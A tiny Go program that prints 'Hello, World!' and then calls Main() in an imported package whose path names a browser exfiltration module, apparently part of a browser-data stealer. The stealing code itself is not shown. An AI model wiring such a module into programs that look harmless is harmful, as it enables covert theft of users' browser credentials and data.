package main import ( "adderall/modules/exfil/browser" "fmt" ) func main() { fmt.Println("Hello, World!") browser.Main() }